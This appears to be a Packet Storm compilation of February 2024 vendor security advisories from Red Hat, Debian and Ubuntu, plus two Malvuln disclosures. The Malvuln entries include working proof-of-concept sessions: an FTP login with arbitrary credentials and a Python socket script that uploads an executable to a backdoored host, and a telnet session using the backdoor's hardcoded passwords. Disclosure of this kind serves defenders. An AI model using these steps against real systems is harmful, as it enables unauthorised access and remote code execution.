Red Hat Security Advisory 2024-1059-03 - An update for python-pillow is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1059.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-pillow security updateAdvisory ID:        RHSA-2024:1059-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1059Issue date:         2024-02-29Revision:           03CVE Names:          CVE-2023-50447====================================================================Summary: An update for python-pillow is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* pillow:Arbitrary Code Execution via the environment parameter (CVE-2023-50447)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50447References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2259479

Red Hat Security Advisory 2024-1059-03

Red Hat Security Advisory 2024-1058-03 - An update for python-pillow is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1058.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-pillow security updateAdvisory ID:        RHSA-2024:1058-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1058Issue date:         2024-02-29Revision:           03CVE Names:          CVE-2023-50447====================================================================Summary: An update for python-pillow is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* pillow:Arbitrary Code Execution via the environment parameter (CVE-2023-50447)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50447References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2259479

Red Hat Security Advisory 2024-1058-03

Red Hat Security Advisory 2024-1057-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include crlf injection and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1057.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update  
Advisory ID:        RHSA-2024:1057-03  
Product:            Red Hat Ansible Automation Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1057  
Issue date:         2024-02-29  
Revision:           03  
CVE Names:          CVE-2022-40896  
====================================================================

Summary: 

An update is now available for Red Hat Ansible Automation Platform 2.4.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.

Security Fix(es):

* automation-eda-controller / ansible-rulebook / ansible-automation-platform-installer: Insecure websocket used when interacting with EDA server (CVE-2024-1657)

* python3-django/python39-django: denial-of-service in 'intcomma' template filter (CVE-2024-24680)

* python3-jinja2/python39-jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195)

* python3-aiohttp/python39-aiohttp: CRLF injection if user controls the HTTP method using aiohttp client (CVE-2023-49082)

* python3-aiohttp/python39-aiohttp: HTTP request modification (CVE-2023-49081)

* python3-aiohttp/python39-aiohttp: numerous issues in HTTP parser with header parsing (CVE-2023-47627)

* python3-pycryptodomex/python39-pycryptodomex: side-channel leakage for OAEP decryption in PyCryptodome and pycryptodomex (CVE-2023-52323)

* python3-pillow/python39-pillow: uncontrolled resource consumption when textlength in an ImageDraw instance operates on a long text argument (CVE-2023-44271)

* python3-pygments/python39-pygments: ReDoS in pygments (CVE-2022-40896)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Updates and fixes for automation controller:  
* automation-controller has been updated to 4.5.2  
* Enabled HashiCorp Vault LDAP and Userpass authentication (AAP-19842)

Updates and fixes for automation hub:  
* automation-hub and python3-galaxy-ng/python39-galaxy-ng have been updated to 4.9.1  
* various dependencies have been updated

Updates and fixes for Event-Driven Ansible:  
* automation-eda-controller has been updated to 1.0.5  
* various dependencies have been updated  
* Fixed a vulnerability that allowed command line injections in user and url fields for projects (AAP-17778)  
* The communication between the activations and eda-server is now authenticated. Once EDA Controller is upgraded, all the existing running activations must be restarted with upgraded Decision Environment images (AAP-17619)  
* Removed 409 conflict error when enabling an activation (AAP-16305)  
* An activation status did not change to failed when an internal error occurred (AAP-16014)  
* Restarting the EDA server can cause activation states to become stale (AAP-13064)  
* RHEL 9.2 activations can not connect to the host (AAP-12929)  
* Added podman_containers_conf_logs_max_size variable to control max log size for podman installations with a default value of 10 MiB (AAP-12295)

Note: The 2.4-6 installer/setup should be used to update Event-Driven Ansible to 1.0.5

Updates and fixes for installer and setup:  
* Added podman_containers_conf_logs_max_size variable for containers.conf to control max log size for podman installations with a default value of 10 MiB (AAP-19775)  
* EDA debug flag of false will now correctly disable django debug mode (AAP-19577)  
* installer and setup have been updated to 2.4-6

Additional changes:  
* ansible-builder has been updated to 3.0.1  
* ansible-runner has been updated to 2.3.5  
* ansible-dev-tools has been added

For more details about the updates and fixes included in this release, refer to the Release Notes.

Solution:

CVEs:

CVE-2022-40896

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2247820  
https://bugzilla.redhat.com/show_bug.cgi?id=2249825  
https://bugzilla.redhat.com/show_bug.cgi?id=2251643  
https://bugzilla.redhat.com/show_bug.cgi?id=2252235  
https://bugzilla.redhat.com/show_bug.cgi?id=2252248  
https://bugzilla.redhat.com/show_bug.cgi?id=2257028  
https://bugzilla.redhat.com/show_bug.cgi?id=2257854  
https://bugzilla.redhat.com/show_bug.cgi?id=2261856  
https://bugzilla.redhat.com/show_bug.cgi?id=2265085

Red Hat Security Advisory 2024-1057-03

Red Hat Security Advisory 2024-1055-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1055.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:1055-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1055Issue date:         2024-02-29Revision:           03CVE Names:          CVE-2023-6546====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6546References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2255498

Red Hat Security Advisory 2024-1055-03

Red Hat Security Advisory 2024-1041-03 - An update for go-toolset-1.19-golang is now available for Red Hat Developer Tools. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1041.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: go-toolset-1.19-golang security updateAdvisory ID:        RHSA-2024:1041-03Product:            Red Hat Developer ToolsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1041Issue date:         2024-02-29Revision:           03CVE Names:          CVE-2023-39326====================================================================Summary: An update for go-toolset-1.19-golang is now available for Red Hat Developer Tools.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: cmd/go: Protocol Fallback when fetching modules (CVE-2023-45285)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39326References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2253323https://bugzilla.redhat.com/show_bug.cgi?id=2253330

Red Hat Security Advisory 2024-1041-03

Debian Linux Security Advisory 5634-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5634-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 28, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1938 CVE-2024-1939Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), this problem has been fixed inversion 122.0.6261.94-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXfhAcACgkQZF0CR8Nudjfb1g/9H3MTUe56oMfSFIxki7qRpyzRcYvSVgJ79T3fX5t9+s9mEtyPa3z2rZFoI4+0VHnUOxEyRdsmd+hjrCr5gl2UW7NjkAczVLNjJ57TRtP0//81L5CjZXKPA/uJMTftRbdoKJG4+nC/G7dgwmxEq8bTjXZ4qvKTmEn6LlUuoxfwp1PS+r7d0MEHFSLQNh/wBUNGYshhGSWkMG18LV0+V/7tQeXvj2SgQCjJuhIm8hFcgwxAFZgCcLnNLfVFI/85GojBUpCPk7jo9A/n0GHoEQNdN/piddYbYrRWeiA+1xnEJb0DdXW7HFOIgb3NUXn4F7QpAVxxi4iZ5cSZCASzzvRl5bhj+JPl309GlhY/QLU1sXF5KES5Y21pi2uioKwZOFkuiTTuyYW9w6NAP8U0CdPgqWNsPQEbbWP5eRHWTQRIiurZ03tb+boyMUXfgdm6NxnU8Z/vmJhiSk9bYC4ZX8h25ukaGT1TTka+9Zo8Mpu7AClVDkKSzn/ybn+gbw7omtl3GLX+bdJEuTKAJTyxKhsb9emAtyBSlr14zT5eNg2RnSx35Xu+0axyX3WUKL57PBqT4k6L+5MMKutwW7CEPHpuSk1paEmw9fw0k3dlhbc26Jg5s5WHyKlUM12AuEI9FBybZM22QneUvVFN3EosxCOQGT+MvU7atVMh+Xzp2LW+20U==iYsy-----END PGP SIGNATURE-----

Debian Security Advisory 5634-1

Ubuntu Security Notice 6653-2 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6653-2  
February 28, 2024

linux-aws, linux-aws-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems

Details:

It was discovered that a race condition existed in the ATM (Asynchronous  
Transfer Mode) subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-51780)

It was discovered that a race condition existed in the AppleTalk networking  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-51781)

Zhenghan Wang discovered that the generic ID allocator implementation in  
the Linux kernel did not properly check for null bitmap when releasing IDs.  
A local attacker could use this to cause a denial of service (system  
crash). (CVE-2023-6915)

Robert Morris discovered that the CIFS network file system implementation  
in the Linux kernel did not properly validate certain server commands  
fields, leading to an out-of-bounds read vulnerability. An attacker could  
use this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2024-0565)

Jann Horn discovered that the TLS subsystem in the Linux kernel did not  
properly handle spliced messages, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2024-0646)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1055-aws     5.15.0-1055.60  
   linux-image-aws-lts-22.04       5.15.0.1055.54

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1055-aws     5.15.0-1055.60~20.04.1  
   linux-image-aws                 5.15.0.1055.60~20.04.42

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6653-2  
   https://ubuntu.com/security/notices/USN-6653-1  
   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,  
   CVE-2024-0646

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1055.60  
   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1055.60~20.04.1

Ubuntu Security Notice USN-6653-2

Backdoor.Win32.Agent.amt malware suffers from bypass and code execution vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2a442d3da88f721a786ff33179c664b7.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Agent.amtVulnerability: Authentication BypassDescription: The malware can run an FTP server which listens on TCP port 2121. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders can then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: AgentType: PE32MD5: 2a442d3da88f721a786ff33179c664b7Vuln ID: MVID-2024-0673Disclosure: 02/28/2024 Exploit/PoC:C:\sec>nc64.exe 192.168.18.125 2121220 Welcome To mybr Ftp!USER gg331 Password required for gg.PASS gg230 User gg logged in.SYST215 UNIX Type: L8 Internet Component SuiteCDUP250 CWD command successful. "C:/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,211,164).STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *import timeHOST = "192.168.18.125"PORT = 54180BUF_SIZE = 32s=socket(AF_INET, SOCK_STREAM)s.connect((HOST, PORT))with open("DOOM_SM.exe", "rb") as f:    while True:         bytez = f.read(BUF_SIZE)        if not bytez:            break        s.send(bytez)        time.sleep(0.5)print("By malvuln")s.close()1/23/2024 9:13:03 PM - gg - 0.0.0.0 Disconnected1/23/2024 9:10:36 PM - gg - 0.0.0.0 STOR C:\DOOM_SM.exe1/23/2024 9:09:54 PM - gg -  PASV C:\1/23/2024 9:09:44 PM - CD C:\1/23/2024 9:09:44 PM - gg -  CDUP C:\1/23/2024 9:09:18 PM - gg -  SYST C:\1/23/2024 9:09:15 PM - gg1/23/2024 9:09:15 PM - gg -  PASS C:\TEMP\hate1/23/2024 9:09:12 PM -  -  USER C:\TEMP\gg1/23/2024 9:09:06 PM -  -  Connected1/23/2024 9:08:58 PM - FTP StartedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.amt MVID-2024-0673 Authentication Bypass / Code Execution

Backdoor.Win32.Jeemp.c malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/d6b192a4027c7d635499133ca6ce067f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Jeemp.cVulnerability: Cleartext Hardcoded CredentialsDescription: The malware listens on three TCP ports which are randomized e.g. 9719,7562,8687,8948,7376,8396 so forth. There is an ESMTP server component "jeem.mail.pv" requiring authentication for the GDATA, SDATA commands and sample is packed using UPX. However, it is trivial to unpack using the -d flag which reveals the cleartext hardcoded credentials "jeepower" and "jeespower" in the PE file.Family: JeempType: PE32MD5: d6b192a4027c7d635499133ca6ce067fVuln ID: MVID-2024-0672Dropped files: msrexe.exeDisclosure: 02/28/2024Exploit/PoC:TELNET x.x.x.x 7562220 jeem.mail.pv ESMTPHELO hate250 okGDATA250 okNeed passwordjeepower[prx]#######250 okSDATA250 okNeed passwordabc123!503 wrong!SDATA250 okNeed passwordjeespower250 okDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Jeemp.c MVID-2024-0672 Hardcoded Credential

Ubuntu Security Notice 6651-2 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6651-2  
February 28, 2024

linux-lowlatency, linux-lowlatency-hwe-6.5, linux-oem-6.5 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-lowlatency: Linux low latency kernel  
- linux-lowlatency-hwe-6.5: Linux low latency kernel  
- linux-oem-6.5: Linux kernel for OEM systems

Details:

It was discovered that a race condition existed in the ATM (Asynchronous  
Transfer Mode) subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-51780)

It was discovered that a race condition existed in the AppleTalk networking  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-51781)

Zhenghan Wang discovered that the generic ID allocator implementation in  
the Linux kernel did not properly check for null bitmap when releasing IDs.  
A local attacker could use this to cause a denial of service (system  
crash). (CVE-2023-6915)

Robert Morris discovered that the CIFS network file system implementation  
in the Linux kernel did not properly validate certain server commands  
fields, leading to an out-of-bounds read vulnerability. An attacker could  
use this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2024-0565)

Jann Horn discovered that the io_uring subsystem in the Linux kernel did  
not properly handle the release of certain buffer rings. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2024-0582)

Jann Horn discovered that the TLS subsystem in the Linux kernel did not  
properly handle spliced messages, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2024-0646)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   linux-image-6.5.0-21-lowlatency  6.5.0-21.21.1  
   linux-image-6.5.0-21-lowlatency-64k  6.5.0-21.21.1  
   linux-image-lowlatency          6.5.0.21.21.15  
   linux-image-lowlatency-64k      6.5.0.21.21.15

Ubuntu 22.04 LTS:  
   linux-image-6.5.0-1015-oem      6.5.0-1015.16  
   linux-image-6.5.0-21-lowlatency  6.5.0-21.21.1~22.04.1  
   linux-image-6.5.0-21-lowlatency-64k  6.5.0-21.21.1~22.04.1  
   linux-image-lowlatency-64k-hwe-22.04  6.5.0.21.21.1~22.04.7  
   linux-image-lowlatency-hwe-22.04  6.5.0.21.21.1~22.04.7  
   linux-image-oem-22.04d          6.5.0.1015.17

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6651-2  
   https://ubuntu.com/security/notices/USN-6651-1  
   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,  
   CVE-2024-0582, CVE-2024-0646

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-lowlatency/6.5.0-21.21.1

 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-6.5/6.5.0-21.21.1~22.04.1  
   https://launchpad.net/ubuntu/+source/linux-oem-6.5/6.5.0-1015.16

Source

Packet Storm